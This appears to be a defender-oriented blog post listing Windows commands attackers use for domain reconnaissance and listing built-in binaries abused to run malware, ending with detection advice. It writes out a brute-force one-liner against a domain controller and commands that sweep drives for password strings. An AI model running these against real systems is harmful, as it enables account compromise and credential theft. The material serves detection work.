Microsoft Operating system CLI ( Command Line Interface ) is a great feature to do background jobs , likely to runs scripts ,automation stuffs etc.It helps folks like system analyst ,network engineers and more techies to dig and troubleshooting an operating system to understand the root-cause for the problems. Most importantly an intruder can also leverage this CLI to do bad things to run a malicious commands to take over your system to get full access ,control and exfiltrate data to attackers servers.
Initial Reconnaissance
Identification of this activity will save your organization from security breaches , Monitoring a specific patterns and time intervals will provide you lots of information on your investigation. Lets Take a look of initial commands on this phase.
| Windows Command | Attacker Intention | |
| Ipconfig | Used to collect network and DNS information | |
| Tasklist | Tasklist can be used to discover & explore software currently running on a system by process name of known products. | |
| Systeminfo | Provides Much information about OS version, Owner Name, Processor Type, BIOS Version, System Model, Time Zone, Boot Time, and more. | |
| Query | Information like processes, sessions, and Remote Desktop sessions are Obtained. | |
| Qprocess | Obtain the process information on Remote Desktop Session. | |
| Net start | START/STOP a known or Unknown service. | |
| Whoami | System user Information | |
| Netstat | List of well-established connections to existing IP’s | |
| Net time | To gather the Time Information | |
| Ver | Microsoft Windows Version information | |
| net user /domain | Performs the operation on the domain controller in the computer’s primary domain. | |
| net localgroup administrators | displays the local administrator’s group on the computer. | |
| net localgroup administrators /domain | displays the local administrators’ group on a current domain controller. | |
| net group /domain | Display groups and performs the operation on the domain controller in the current domain. | |
| net group “Domain Admins” /domain | Query users from domain admins in the current domain. | |
| net group “Domain Computers” /domain | Query all domain computers in the current domain. | |
| net group “Domain Controllers” /domain | Query Domain Controllers Computers. | |
| net group “Domain Policy Creator Owners” /domain | Query Domain Policy Creators. | |
| wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber | Local storage device management. | |
| net share | displays information about all of the resources that are shared on the local computer. | |
| wmic share | Shared resource management. | |
| net accounts /domain | Updates the user accounts database and modifies password and logon requirements for all accounts. Performs the operation on the primary domain controller of the current domain. | |
| wmic useraccount LIST BRIEF | Print account information. | |
| type C:\Windows\system32\soc_analyst.txt | Show the contents of a file. | |
| dir /a | Displays files with specified attributes. | |
| dir /s | Searches sub-directories | |
dir /s “*match-text*” | Searches for the word entered in the match-text the section in all sub-dirs of the current directory. | |
find /I password C:\Windows\System32*.ini | Searches for a password string in a file or files. | |
| tree /F C:\Windows\system32 | Graphically displays the folder structure of a drive or path. | |
| fsutil fsinfo drives | Lists the current drives on the system. | |
| wmic volume | Local storage volume management. | |
net use \\ip\ipc$ password /user:username | Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. | |
| @FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \DomainController\IPC$ /user:%n %p 1>NUL 2>&1 && @echo [*] %n:%p && | Bruteforce Windows accounts | |
| FOR /F %f in (‘dir /b /s C:’) do find /I “password” %f | Search password in file or files from C:| | |
| wmic startup | Management of commands that run automatically when users log onto the computer system. | |
Also Read: Lateral Movement Detection with Windows Event Logs
Malware Execution & Spread
Post successful reconnaissance, the Threat actor may use the live system inbuilt functionality to bring the malware and execute on the premise. Later an attacker may move inside your network to infect and exfiltrate the confidential data. Let us Take a look at the initial commands on this phase.
| Windows Commands | Attackers Goal |
| At.exe | Schedule periodic tasks |
| Atbroker.exe | Atbroker.exe is a process associated with the Windows Assistive Technology Manager utility, It can also run an unknown file. |
| bash.exe | Windows subsystem for Linux |
| Bitsadmin.exe | Used in hiding unknown files, move, copy and execute any unknown files. |
| Cmstp.exe | Installs or removes a Connection Manager service profile. Silently installs a . INF without creating a desktop icon. |
| Diskshadow.exe | uses this utility to execute a malicious file. |
| Dnscmd.exe | To start a malicious DLL in the DNS server. |
| Explorer.exe | uses this utility to execute a malicious file. |
| Extexport.exe | uses this utility to execute malicious DLL. |
| Forfiles.exe | uses this utility to execute a malicious file. |
| Ftp.exe | use this utility to execute malicious files. |
| Gpscript.exe | Executes logon scripts configured in Group Policy. |
| Ie4uinit.exe | Executes commands from a specially prepared ie4uinit.inf file. |
| Ieexec.exe | Downloads and executes malicious.exe from the remote server. |
| Infdefaultinstall.exe | uses this utility to execute malicious INF. |
| Installutil.exe | uses this utility to execute malicious DLL. |
| Mavinject.exe | uses this utility to execute malicious DLL. |
| Microsoft.Workflow.Compiler.exe | Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file |
| Mmc.exe | Launch a ‘backgrounded’ MMC process and invoke a COM payload |
| Msbuild.exe | Build and execute a C# project stored in the target XML file. |
| Msconfig.exe | Code execution using Msconfig.exe |
| Msdt.exe | Execute code bypass Application whitelisting |
| Extexport.exe | Execute DLL files |
| Update.exe | Download and Execute a file |
| Tracker.exe | Proxy execution of an arbitrary DLL into another process |
| SQLToolsPS.exe | Execute a malicious file |
Conclusion
Restrict unnecessary commands for normal users using Applocker Rules, Collect the app locker events and correlate with SIEM (Security information and event management ) for earlier detection’s, Also consider detection rules under EDR as high alert with this kind of occurrences, as this malicious use of windows commands may leverage and compromise your organization on next few minutes.